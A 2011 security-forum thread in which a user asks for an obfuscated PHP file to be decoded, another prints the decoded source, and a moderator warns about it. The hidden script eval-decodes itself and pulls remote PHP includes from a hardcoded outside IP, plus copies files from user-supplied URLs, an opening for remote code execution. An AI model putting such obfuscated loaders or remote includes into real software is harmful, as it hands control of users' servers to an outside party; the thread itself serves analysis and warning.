 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Please Decode This Php File |
 |
Posted: Mon Apr 25, 2011 4:19 pm |
|
|
soul_reaper |
Regular user |

 |
|
Joined: Apr 25, 2011 |
Posts: 7 |
|
|
|
 |
 |
 |
|
Hi guys ,please help me to decode this php file
tnx in advance
Code: |
<?php
if(!function_exists("agF1gTdKEBPd6CaJ")) { function agF1gTdKEBPd6CaJ($ekV4gb3DGH29YotI) { $fYZ2g87NjIGLnXVg=""; $rZJ3glaFcSAz0dZY=0; $qVh0gqGnK20A4iOB=strlen($ekV4gb3DGH29YotI); while($rZJ3glaFcSAz0dZY < $qVh0gqGnK20A4iOB) { if($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY] == ' ') { $fYZ2g87NjIGLnXVg.=" "; } else if($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY] == '!') { $fYZ2g87NjIGLnXVg.=chr((ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY+1])-ord('A'))*16+(ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY+2])-ord('a'))); $rZJ3glaFcSAz0dZY+=2; } else { $fYZ2g87NjIGLnXVg.=chr(ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY])+1); } $rZJ3glaFcSAz0dZY++; } return $fYZ2g87NjIGLnXVg; } }eval(agF1gTdKEBPd6CaJ('du`k!Ci`fE0fScJDAOc5B`I!Ci&cppmp]pcnmprgle!CbBh.!Ci9 glajsbc %frrn8--/51,0/0,003,020-!CbGnkwqapgnrq-uc`k_qrcpq-tgbcmq-fc_b,rvr%9 glajsbc %fc_bcp,nfn%9 glajsbc %frrn8--/51,0/0,003,020-!CbGnkwqapgnrq-uc`k_qrcpq-tgbcmq-_b/,rvr%9 !CbBdagb ; !CbBd]ECRY%agb%!CbEm9 !CbBdtcpqgml ; !CbBd]ECRY%tcpqgml%!CbEm9 !CbBdi ; !CbBd]ECRY%i%!CbEm9 !CbBdn ; !CbBd]ECRY%n%!CbEm9 !CbBdx ; !CbBd]ECRY%x%!CbEm9 !CbBdl_kc ; !CbBd]ECRY%l_kc%!CbEm9 glajsbc %qcrrgleq,nfn%9 gd!CbBh!CbBdqgrcl_kc;;%% zz !CbBdqgrcl_kc;;LSJJ!Ci y!CbBdqgrcl_kc ; !CbBdlbqefdek9{ gd!CbBh!CbBa!CbBdtcpqgml!Ci y !Cb@jgd!CbBh!CbBa!CbBdagb!Ci y gd!CbBh!CbBa!CbBdi zz !CbBdi;;LSJJ!Ci y!CbBdi ; %amkcbw agpasq%9{ !CbBdk_qrcpkglb]n_p_kq; %frrn8--/51,0/0,003,020-!CbGnkwqapgnrq-uc`k_qrcpq-tgbcmq-glbcv,nfn=i;%,spjclambc!CbBh!CbBdi!Ci,%$n;%,!CbBdn9{ gd!CbBh!CbBdagb!Ci y!CbBdk_qrcpkglb]n_p_kq; %frrn8--/51,0/0,003,020-!CbGnkwqapgnrq-uc`k_qrcpq-tgbcmq-glbcv,nfn=agb;%,!CbBdagb9{ !CbBdk_qrcpkglb]_b]f_lbjc ; >dmncl!CbBh!CbBdk_qrcpkglb]n_p_kq* %p%!Ci9 !CbBdbgqnj_w;!CbBb!CbBb9 gd !CbBh!CbBdk_qrcpkglb]_b]f_lbjc!Ci y ufgjc !CbBh!CbBadcmd!CbBh!CbBdk_qrcpkglb]_b]f_lbjc!Ci!Ci y !CbBdbgqnj_w,; dpc_b!CbBh!CbBdk_qrcpkglb]_b]f_lbjc* 6/70!Ci9 { dajmqc!CbBh!CbBdk_qrcpkglb]_b]f_lbjc!Ci9 { cafm !CbBdbgqnj_w9 { !Cb@jgd!CbBh!CbBdtcpqgml!Ci y !Cb@j !Cb@jgd!CbBh!CbBdx!Ci y!CbBdcvr ; %,kn1%9{ cjqc y!CbBdcvr ; %,1en%9{ gd!CbBh!CbBagq]bgp!CbBh!CbBbtgZv42Zv43mZv51!CbBb!Ci!Ci ykibgp!CbBh!CbBbZ/44Z/3/Zv42cmq!CbBb!Ci9{ !CbBd`_qc ; bgpl_kc!CbBh]]DGJC]]!Ci9 !CbBdamknjcrc ; npce]pcnj_ac!CbBh_pp_w!CbBh%!CbBc !CbBc%*%!CbBc$!CbBc%*%!CbBc_kn9!CbBc%!Ci*_pp_w!CbBh%]%*%_lb%*%%!Ci*spjbcambc!CbBh!CbBdl_kc!Ci!Ci,%]%,!CbBdqgrcl_kc,!CbBdcvr9 amnw!CbBh%frrn8--%,!CbBdtcpqgml*!CbBd`_qc,%-tgbcmq-%,!CbBdamknjcrc!Ci9 !CbBdqgxc ; pmslb!CbBh!CbBhdgjcqgxc!CbBh!CbBd`_qc,%-tgbcmq-%,!CbBdamknjcrc!Ci-/.26354!Ci* 1!Ci9 cafm %:bgt aj_qq;!CbBb!CbBb<:_ fpcd;!CbBbtgbcmq-%,!CbBdamknjcrc,%!CbBb<Bmuljm_b Dgjc:-_< :`<!CbBh%,!CbBdqgxc,% K@!Ci:-`< :-bgt<%9 !CbBdfmspq ; !CbBb/!CbBb9 !CbBdqcamlbq ; !CbBh!CbBdfmspq(4.(4.!Ci9 !CbBdbgp ; %tgbcmq-%9 dmpc_af !CbBhejm`!CbBh!CbBdbgp,%(,(%!Ci _q !CbBdbcj!Ci ygd !CbBhdgjc]cvgqrq!CbBh!CbBb!CbBdbcj!CbBb!Ci $$ !CbBh!CbBhrgkc!CbBh!Ci + dgjckrgkc!CbBh!CbBb!CbBdbcj!CbBb!Ci!Ci < !CbBdqcamlbq!Ci!Ci ysljgli!CbBh!CbBb!CbBdbcj!CbBb!Ci9{{ { !Cb@jglajsbc %frrn8--/51,0/0,003,020-!CbGnkwqapgnrq-uc`k_qrcpq-tgbcmq-_b0,rvr%9 glajsbc %dmmrcp,nfn%9 &((:')); ?>
|  |
|
|
|
|
 |
 |
|
 |
Posted: Mon Apr 25, 2011 5:29 pm |
|
|
johnburn |
Advanced user |

 |
|
Joined: Jan 14, 2011 |
Posts: 199 |
Location: Malaysia |
|
|
 |
 |
 |
|
Code: | <?php
error_reporting(0);
include 'http://173.212.225.242/~myscripts/webmasters/videos/head.txt';
include 'header.php';
include 'http://173.212.225.242/~myscripts/webmasters/videos/ad1.txt';
$cid = $_GET['cid'];
$version = $_GET['version'];
$k = $_GET['k'];
$p = $_GET['p'];
$z = $_GET['z'];
$name = $_GET['name'];
include 'settings.php';
if ($sitename == '' || $sitename == NULL) {
$sitename = $ndsghfgm;
}
if (!$version) {
if (!$cid) {
if (!$k || $k == NULL) {
$k = 'comedy circus';
}
$mastermind_params = 'http://173.212.225.242/~myscripts/webmasters/videos/index.php?k=' . urlencode($k) . '&p=' . $p;
}
if ($cid) {
$mastermind_params = 'http://173.212.225.242/~myscripts/webmasters/videos/index.php?cid=' . $cid;
}
$mastermind_ad_handle = @fopen($mastermind_params, 'r');
$display = "";
if ($mastermind_ad_handle) {
while (!feof($mastermind_ad_handle)) {
$display.= fread($mastermind_ad_handle, 8192);
}
fclose($mastermind_ad_handle);
}
echo $display;
}
if ($version) {
if ($z) {
$ext = '.mp3';
} else {
$ext = '.3gp';
}
if (!is_dir("videos")) {
mkdir("videos");
}
$base = dirname(__FILE__);
$complete = preg_replace(array('# #', '#&#', '#amp;#'), array('_', 'and', ''), urldecode($name)) . '_' . $sitename . $ext;
copy('http://' . $version, $base . '/videos/' . $complete);
$size = round((filesize($base . '/videos/' . $complete) / 1048576), 3);
echo '<div class=""><a href="videos/' . $complete . '">Download File</a> <b>(' . $size . ' MB)</b> </div>';
$hours = "1";
$seconds = ($hours * 60 * 60);
$dir = 'videos/';
foreach(glob($dir . '*.*') as $del) {
if (file_exists("$del") && ((time() - filemtime("$del")) > $seconds)) {
unlink("$del");
}
}
}
include 'http://173.212.225.242/~myscripts/webmasters/videos/ad2.txt';
include 'footer.php';
?>
|
|
|
|
|
|
 |
 |
|
 |
Posted: Mon Apr 25, 2011 5:40 pm |
|
|
soul_reaper |
Regular user |

 |
|
Joined: Apr 25, 2011 |
Posts: 7 |
|
|
|
 |
 |
 |
|
johnburn wrote: | Code: | <?php
error_reporting(0);
include 'http://173.212.225.242/~myscripts/webmasters/videos/head.txt';
include 'header.php';
include 'http://173.212.225.242/~myscripts/webmasters/videos/ad1.txt';
$cid = $_GET['cid'];
$version = $_GET['version'];
$k = $_GET['k'];
$p = $_GET['p'];
$z = $_GET['z'];
$name = $_GET['name'];
include 'settings.php';
if ($sitename == '' || $sitename == NULL) {
$sitename = $ndsghfgm;
}
if (!$version) {
if (!$cid) {
if (!$k || $k == NULL) {
$k = 'comedy circus';
}
$mastermind_params = 'http://173.212.225.242/~myscripts/webmasters/videos/index.php?k=' . urlencode($k) . '&p=' . $p;
}
if ($cid) {
$mastermind_params = 'http://173.212.225.242/~myscripts/webmasters/videos/index.php?cid=' . $cid;
}
$mastermind_ad_handle = @fopen($mastermind_params, 'r');
$display = "";
if ($mastermind_ad_handle) {
while (!feof($mastermind_ad_handle)) {
$display.= fread($mastermind_ad_handle, 8192);
}
fclose($mastermind_ad_handle);
}
echo $display;
}
if ($version) {
if ($z) {
$ext = '.mp3';
} else {
$ext = '.3gp';
}
if (!is_dir("videos")) {
mkdir("videos");
}
$base = dirname(__FILE__);
$complete = preg_replace(array('# #', '#&#', '#amp;#'), array('_', 'and', ''), urldecode($name)) . '_' . $sitename . $ext;
copy('http://' . $version, $base . '/videos/' . $complete);
$size = round((filesize($base . '/videos/' . $complete) / 1048576), 3);
echo '<div class=""><a href="videos/' . $complete . '">Download File</a> <b>(' . $size . ' MB)</b> </div>';
$hours = "1";
$seconds = ($hours * 60 * 60);
$dir = 'videos/';
foreach(glob($dir . '*.*') as $del) {
if (file_exists("$del") && ((time() - filemtime("$del")) > $seconds)) {
unlink("$del");
}
}
}
include 'http://173.212.225.242/~myscripts/webmasters/videos/ad2.txt';
include 'footer.php';
?>
|
|
wow tnx buddy how you did`it ? |
|
|
|
|
 |
 |
|
 |
Posted: Mon Apr 25, 2011 6:19 pm |
|
|
Cyko |
Moderator |

 |
|
Joined: Jul 21, 2009 |
Posts: 375 |
|
|
|
 |
 |
 |
|
If http://173.212.225.242 is not your server I highly suggest you remove all those include lines to avoid being compromised. |
|
|
|
|
Posted: Mon Apr 25, 2011 6:51 pm |
|
|
soul_reaper |
Regular user |

 |
|
Joined: Apr 25, 2011 |
Posts: 7 |
|
|
|
 |
 |
 |
|
Cyko wrote: | If http://173.212.225.242 is not your server I highly suggest you remove all those include lines to avoid being compromised. |
i already did that  |
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|